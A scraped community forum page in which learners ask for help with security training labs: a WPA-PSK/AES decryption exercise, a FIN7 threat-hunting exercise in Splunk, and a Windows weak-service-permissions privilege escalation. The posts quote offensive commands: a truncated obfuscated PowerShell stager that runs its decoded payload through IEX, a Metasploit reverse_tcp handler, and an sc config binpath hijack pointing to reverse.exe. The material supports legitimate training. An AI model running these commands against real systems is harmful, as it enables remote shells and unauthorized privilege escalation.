getting started
6 Topics
63Views0likes2Comments
Modern Encryption: Demonstrate Your Skills (Q9)
Maybe I'm over/under-thinking this (likely) or maybe there's an issue with this lab (less likely) but I'm struggling on Q9. I've successfully encrypted the file in Q5 and have run the appropriate command to retrieve the PSK from the capture file that was created. Per the instructions in the token_3.txt file I'm supposed to use that same password to decrypt an AES-256 file. I cannot get this password to successfully decrypt the file however. I know it's the correct passphrase since I can use it in Wireshark to see the encrypted data in the capture. Am I supposed to extract the key for Q9 from the capture? I'm only seeing mostly DNS traffic (and looked at TXT records to see if a possible token existed in those). openssl enc -d -aes-256-cbc -nosalt -pbkdf2 -in Desktop/Lab-Files/encrypted_file_AES.enc -out Desktop/Lab-Files/plaintext_AES.txt -pass pass:<PSK from results of aircrack-ng> I guessing I'm misunderstanding the instructions somehow (even though I feel like they explicitly tell me "you will find that the same password will help you decrypt 'encrypted_file_AES"Solved153Views0likes2Comments
FIN7 Threat Hunting with Splunk: Ep.3 – Execution Logs
I am pulling my hair with this last question Rebuild the PowerShell script from the previous question using the three parts found in the PowerShell operational logs. What is the MD5 hash of this file? (The file should not contain any trailing white space or return characters) I ran index=* (EventCode=4104) | search "stager.ps1" AND "scriptblock" | table _raw and added the script content of files (1 of 3) (2 of 3) (3 of 3) to a new file. I removed the spaces and made sure they are glued together. I pasted the file in cyber chef with md5 selected and I keep getting the wrong hash. See a sample of the beginning and end of the 3 files This is just a sample below. I really don't know what else to do with this. $EncodedCompressedFile = @' 7b1pk+LKcjD83RH3P5y4cT/Y0ddusfXAfcMRT5U2JJCgBBJIDn8AAQIklmmgBfz6N7O00sCcnuuxH9vPUcRMo1qycqvMrFItfxmsgu3keHqf//avv/2fP//pH/5NiiJts9+9H//xz+H8fTuPatV/mUXRn//p u3rgE9+I/KPY62u+qTQuvp0Xqu3KPkEovj/867/++Z/+9A9/+oe/jFZbY7757V9/w1+96fpvf3NW78fTJCJRtPP/UfjrvxmT4/Lf//Y3Y3L+x79ML8f54V+6821wXP5VOFcEQfgn+FuDv/CnLnCY/za4HI7zzb9Yp+1xtZn/i7Y9zt93+8H8/WPlQ3Vj8n5YTiKAKe72lxToX4W/prj89aaVHEuOm/g+nxznwyX8mQFuRR38ja3//w== '@ $Decoded = [System.Convert]::FromBase64String($EncodedCompressedFile) $MemStream = New-Object System.IO.MemoryStream $MemStream.Write($Decoded, 0, $Decoded.Length) $MemStream.Seek(0,0) | Out-Null $CompressedStream = New-Object System.IO.Compression.DeflateStream($MemStream, [System.IO.Compression.CompressionMode]::Decompress) $StreamReader = New-Object System.IO.StreamReader($CompressedStream) $Output = $StreamReader.readtoend() $Output | IEXSolved153Views0likes1CommentPrivilege Escalation: Windows – Weak Service Permissions
Could someone please explain the steps to be performed in last part of the lab?. Where should I run "migrate -N LogonUI.exe"? It fails in windows and kali. msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.102.60.159; set lport 4444; exploit" sc config DeleteFiles binpath="C:\Temp\reverse.exe" sc qc DeleteFiles shows the path is "C:\Temp\reverse.exe" Restart windows, but windows doesn´t really restars with "right click" on "windows logo" "Shut Down or Sign out" and I execute again: xfreerdp /v:10.102.158.164 /u:Levi /p:Abc123 /dynamic-resolution migrate -N LogonUI.exe, where and after which steps? when restarting windows this is the mesage but it doesn´t restart [21:07:26:552] [64590:64591] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C] Regards.Solved236Views1like2Comments
